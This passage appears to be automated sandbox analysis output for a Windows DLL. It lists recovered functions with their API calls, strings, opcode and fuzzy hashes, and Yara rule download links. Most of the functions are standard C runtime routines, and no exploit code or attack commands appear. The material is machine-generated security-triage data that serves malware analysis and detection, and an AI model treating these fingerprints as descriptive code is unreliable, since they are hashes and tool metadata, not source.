Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a5016a7b707c7ab49c3ac2f3d77b55fd9802da13418db9205f5e2773b296e195
Instruction ID: 9496aee8cb1fd4ab3e44c68319b0141d2c9896f2e2630b6e60353b4c28a19e52
Opcode Fuzzy Hash: a5016a7b707c7ab49c3ac2f3d77b55fd9802da13418db9205f5e2773b296e195
Instruction Fuzzy Hash: 2BF06232608E099B8E54CAE4E4C5DDA33EEBA113103750D0AF158D7940DB30F9C8DEA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A94E9, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E221780,?,?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A94F3
LeaveCriticalSection.KERNEL32(6E221780,?,?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A9526
RtlWakeAllConditionVariable.NTDLL ref: 6E1A95A9
SetEvent.KERNEL32(?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A95B3
ResetEvent.KERNEL32(?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A95BF

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 0a42dec16883af29ed4a13aebac0a8bf67ce07d19d13a32cbbdfb4fe330d5f11
Instruction ID: 92807caec88f0a435818cd6f74084ff084b2d57f0e033d55b07a5356e8aed6e0
Opcode Fuzzy Hash: 0a42dec16883af29ed4a13aebac0a8bf67ce07d19d13a32cbbdfb4fe330d5f11
Instruction Fuzzy Hash: 64016D75600A24DFCF04AF98E98DEE837A6FB4B351701806AF60187700CB725A81EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CC4C1, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 375COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 6E1CC647
__freea.LIBCMT ref: 6E1CC663

Strings

a/p, xrefs: 6E1CC72B
am/pm, xrefs: 6E1CC6C7

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 8592b55896512e1f695aea9e601462a47bd74d8912e6d6a354a384128f7c1b6e
Instruction ID: 55be09a946fb640bcdd229d120df1a0eab3e2287521b223d2652c24e400adc14
Opcode Fuzzy Hash: 8592b55896512e1f695aea9e601462a47bd74d8912e6d6a354a384128f7c1b6e
Instruction Fuzzy Hash: E3C1BC75940216CADB40CFE8C9A0AABB7B0FF76B00F224149E514EF654D3399DC1EB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1899C9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1899D0

Part of subcall function 6E18AECC: __EH_prolog3.LIBCMT ref: 6E18AED3

Part of subcall function 6E18AE34: __EH_prolog3.LIBCMT ref: 6E18AE3B

Strings

), xrefs: 6E189B4B
|, xrefs: 6E189B2D
), xrefs: 6E189AA3

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: )$)$|
API String ID: 431132790-3127124959
Opcode ID: 84d8b7c5596a7b7002646ee47e096b95b8b1d2557d4cdce6e680fe16adba95ca
Instruction ID: 209b861f2dfd74443c1714f9e2a60581ca159fe74db587a341414c05c8c238d2
Opcode Fuzzy Hash: 84d8b7c5596a7b7002646ee47e096b95b8b1d2557d4cdce6e680fe16adba95ca
Instruction Fuzzy Hash: 4C510A71D102099EDF40CFE4C994BEFBAFCAF08309F104969D519F6241E7799A849FA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CDADB, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E1CDB1E, 6E1CDB25, 6E1CDB5B
(3Y, xrefs: 6E1CDB2C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: (3Y$C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-3261551675
Opcode ID: acc3f71d7091c16b3ce3adcd778047143d8d20421f1c34399c6a5a7d1e0bd6fd
Instruction ID: 9abc499fe13e3333f5cc218fdc82e7d9a70736f7d63d172e211397bb668cb4ef
Opcode Fuzzy Hash: acc3f71d7091c16b3ce3adcd778047143d8d20421f1c34399c6a5a7d1e0bd6fd
Instruction Fuzzy Hash: E841B371E54615AFDB11CFD98C80EDEBBBDFFA6B14B1004A6E500D7200D7759A80EB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE935, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E1AE95A
CatchIt.LIBVCRUNTIME ref: 6E1AEA40

Strings

RCC, xrefs: 6E1AE974
MOC, xrefs: 6E1AE96C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: c9b2f4212c473609c250b99c0ee663f3249c7c86a3d25bed3cce69a04cce675a
Instruction ID: 00be2a924f33fe7558eb901c3de62c30956f42ff322a12d2651a45ee112b3833
Opcode Fuzzy Hash: c9b2f4212c473609c250b99c0ee663f3249c7c86a3d25bed3cce69a04cce675a
Instruction Fuzzy Hash: 3B41587690020AAFCF15CFD8CD80AEEBBB5BF48304F248459FA15A6221D3359AD0EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F3D8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19F3DF

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981D0
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981ED
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E19820A

_Mpunct.LIBCPMT ref: 6E19F46C
_Mpunct.LIBCPMT ref: 6E19F486

Strings

$+xv, xrefs: 6E19F491

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Maklocstr$Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 1929215243-1686923651
Opcode ID: ec60f2462bd74c586eecc1732590de24e37622ae72a0d48bb996acf618520df9
Instruction ID: 7762cba599378717141c81ca1288b07ae151f9c16d7a46fefb227b686c7ecf9e
Opcode Fuzzy Hash: ec60f2462bd74c586eecc1732590de24e37622ae72a0d48bb996acf618520df9
Instruction Fuzzy Hash: 1121B5B1504B526ED721CFB584907BBBEFCAB0C604B14491AE499C7E41D734DA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7184, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A718B

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Mpunct.LIBCPMT ref: 6E1A7218
_Mpunct.LIBCPMT ref: 6E1A7232

Strings

$+xv, xrefs: 6E1A723D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 23384044-1686923651
Opcode ID: 2ef79026f46cba837519e6fd4054baf8c49b9381412760f566aa142af5d3e276
Instruction ID: ab0e2211fa93b92030320733f6efe4bec671a74c67537443082e05e77e046dd2
Opcode Fuzzy Hash: 2ef79026f46cba837519e6fd4054baf8c49b9381412760f566aa142af5d3e276
Instruction Fuzzy Hash: 342195B5904B926ED721CFB888507BBBEFCBB09614F04091EE599C7A41D734DA81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADC89, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 6E1ADD1D

Strings

csm, xrefs: 6E1ADCA3
RCC, xrefs: 6E1ADC93
MOC, xrefs: 6E1ADC9B

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: e574eeacf41f01285365a272efbce891a54fd1be54c553443da95ed904455d1e
Instruction ID: d6cd2e56d7290f5b65670e40c4fc8987a5fd61efd4d07598af792b39f8288751
Opcode Fuzzy Hash: e574eeacf41f01285365a272efbce891a54fd1be54c553443da95ed904455d1e
Instruction Fuzzy Hash: 2E1193395046099FD704DFD8D404BB9BBAAEF51729F61049ADA108B2A0D7B4EEC0EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E161D4A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E161D51
std::_Lockit::_Lockit.LIBCPMT ref: 6E161D5E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E161DAF

Part of subcall function 6E1912F3: _Yarn.LIBCPMT ref: 6E191312
Part of subcall function 6E1912F3: _Yarn.LIBCPMT ref: 6E191336

Strings

bad locale name, xrefs: 6E161DC4

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: ab31198290ec0d6172d816beed9034adf578ec31e121243a8d0882ed8aee13af
Instruction ID: b64e1a6491130f0c4c962b18f8e3dc8af66c71529e07012a295c55168af3f63c
Opcode Fuzzy Hash: ab31198290ec0d6172d816beed9034adf578ec31e121243a8d0882ed8aee13af
Instruction Fuzzy Hash: 07118270805784DDD721CFBD814428EFEE47F29304F60899ED19997641C7709788EB59

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5C49, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6E1B5C04), ref: 6E1B5C56
GetLastError.KERNEL32(?,6E1B5C04), ref: 6E1B5C60
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6E1B5C88

Strings

api-ms-, xrefs: 6E1B5C6D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b387825450306a389864d07f9fed010b6740d68138bd4759f4626df1538c1b93
Instruction ID: 09512b4da9259535a610f3a274c4795ba1c40db0e18bf4650b8ffd5bd7686075
Opcode Fuzzy Hash: b387825450306a389864d07f9fed010b6740d68138bd4759f4626df1538c1b93
Instruction Fuzzy Hash: A7E04F30A44205BBEF525FE0DC0AB493EAEAB11B50FA08820F90CE80D4D771E5D1B58A

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D203E, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E1D20C5

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 16a82699a1e575154b2b8751ee047934458732a382a13e0c7d27b13adf3e6678
Instruction ID: 88fd3d6d4414815b60b292489eef478ed5df7573c8b7f1b2611fdc5235143c48
Opcode Fuzzy Hash: 16a82699a1e575154b2b8751ee047934458732a382a13e0c7d27b13adf3e6678
Instruction Fuzzy Hash: FAB16B32A042469FDB01CFE8C8507EEBBF5EF5A340F248569E5649B340D7348986DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2085, Relevance: 6.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1B208C
UnDecorator::getSymbolName.LIBCMT ref: 6E1B211A
DName::operator+.LIBCMT ref: 6E1B221E

Part of subcall function 6E1AFC2F: shared_ptr.LIBCMT ref: 6E1AFC4B

DName::DName.LIBVCRUNTIME ref: 6E1B22DB

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
String ID:
API String ID: 334624791-0
Opcode ID: eb386b62f793249013d5c3094276a895c21550778e1b8fc43036d4821830de9e
Instruction ID: d8bc7a73735df5e9935941271198a4a1d4a36d9cb89fe88781d0369ebd4f5fe4
Opcode Fuzzy Hash: eb386b62f793249013d5c3094276a895c21550778e1b8fc43036d4821830de9e
Instruction Fuzzy Hash: 86818B75D002498FDF01CFD4D494BEEBBB5BF1A310F25406AD915AB241E73299C9EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B36B9, Relevance: 6.2, APIs: 4, Instructions: 178COMMON

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 6E1B3724
operator+.LIBVCRUNTIME ref: 6E1B3774
shared_ptr.LIBCMT ref: 6E1B3840
operator+.LIBVCRUNTIME ref: 6E1B38C6

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: ef99ad49fa8bee383e9fe3c9b6d1f42df889658a1bf879ab4c45d91ee64bb7b2
Instruction ID: 5d77a3e9c1cf75fb3c78e6ce3cec954cb6c3f4d8c94e5cde67965835e1aab9e7
Opcode Fuzzy Hash: ef99ad49fa8bee383e9fe3c9b6d1f42df889658a1bf879ab4c45d91ee64bb7b2
Instruction Fuzzy Hash: 156192B480420AEFDF01CFE8C558AED7BB9FB16304F108569E4259B210E7B296D6EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE328, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E1AE3EF
___AdjustPointer.LIBCMT ref: 6E1AE412
___AdjustPointer.LIBCMT ref: 6E1AE4AE

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b65c9aa54bea4163e9c5fa3b61d7ab9feea55dc3eced9fc10e74ef9ffd344cb8
Instruction ID: 0b2a9a686f1fb6c5a4e67a9e9092c2b1fa6206263c695a69cb397a084fe742c1
Opcode Fuzzy Hash: b65c9aa54bea4163e9c5fa3b61d7ab9feea55dc3eced9fc10e74ef9ffd344cb8
Instruction Fuzzy Hash: BE51B37A604606DFDB15CF98C950BBA77B9EF14314F20482DEE118B290E731EAC0EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B272F, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1B27B7

Part of subcall function 6E1AF8D0: __aulldvrm.LIBCMT ref: 6E1AF901

DName::operator+.LIBCMT ref: 6E1B27C4
DName::operator=.LIBVCRUNTIME ref: 6E1B2844
DName::DName.LIBVCRUNTIME ref: 6E1B2864

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 405d18c4687ab074e145c7635f63c193ae4b0faa16b951c95e1393b29e359a14
Instruction ID: bcf8aa55dabdf6de22bc9ea9949cc11df3c9dab4b3439ab89d9bffaca506f3bb
Opcode Fuzzy Hash: 405d18c4687ab074e145c7635f63c193ae4b0faa16b951c95e1393b29e359a14
Instruction Fuzzy Hash: CE517C74900259DFDB05CFD8C990AADBBF5FB2A300F21809AD5215B294D7719AC9DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB094, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CB35F: _free.LIBCMT ref: 6E1CB36D

Part of subcall function 6E1DA0C8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,6E1D1A71,?,00000000,00000000), ref: 6E1DA16A

GetLastError.KERNEL32 ref: 6E1DB0FC
__dosmaperr.LIBCMT ref: 6E1DB103
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E1DB142
__dosmaperr.LIBCMT ref: 6E1DB149

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: af4de85a7ebebdeff849b11288a2dd123ef6c0b8f581907885717fe501ed4dde
Instruction ID: 33b30469b8d9f8f06dbe93c4dda8327dca88601edf7522d8611fcb4047f1c86b
Opcode Fuzzy Hash: af4de85a7ebebdeff849b11288a2dd123ef6c0b8f581907885717fe501ed4dde
Instruction Fuzzy Hash: 1F21F8716046096F9B10DFE69C80C5F77BDEF143687108918F929D3644D771ECC4A791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB1CF, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe159b745b45bc9c6501d7f42486a769e3074e22f93d2d60b0f1a7127e5534a3
Instruction ID: 2e21353da09eb2a4f3dea68a24d222b13caee7930aa0c1c049078e7de122eec5
Opcode Fuzzy Hash: fe159b745b45bc9c6501d7f42486a769e3074e22f93d2d60b0f1a7127e5534a3
Instruction Fuzzy Hash: 6E218E71604605BF9B10DFE58C80D9F77ACEF25BA87108E14F928D7148E728ECC1A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF749, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
_free.LIBCMT ref: 6E1CF7AB
_free.LIBCMT ref: 6E1CF7E1
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: da4aef9760bbcde85bdb625f36183fea5e9486cae36ebfb2dfebe7fbbbb13022
Instruction ID: 12a7eee53643361033cab14ec1fad328ea87e105dae03532860ea1aac3c101af
Opcode Fuzzy Hash: da4aef9760bbcde85bdb625f36183fea5e9486cae36ebfb2dfebe7fbbbb13022
Instruction Fuzzy Hash: 09110A33214A012F9A415FF84CC4DAA25AEABF6A797350625F334C25C0DF2588CAB122

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,6E17DCEA,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA,?,6E186103,00000054,00000000,6E184386,?,00000000), ref: 6E1CF8A5
_free.LIBCMT ref: 6E1CF902
_free.LIBCMT ref: 6E1CF938
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA,?,6E186103,00000054,00000000,6E184386), ref: 6E1CF943

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

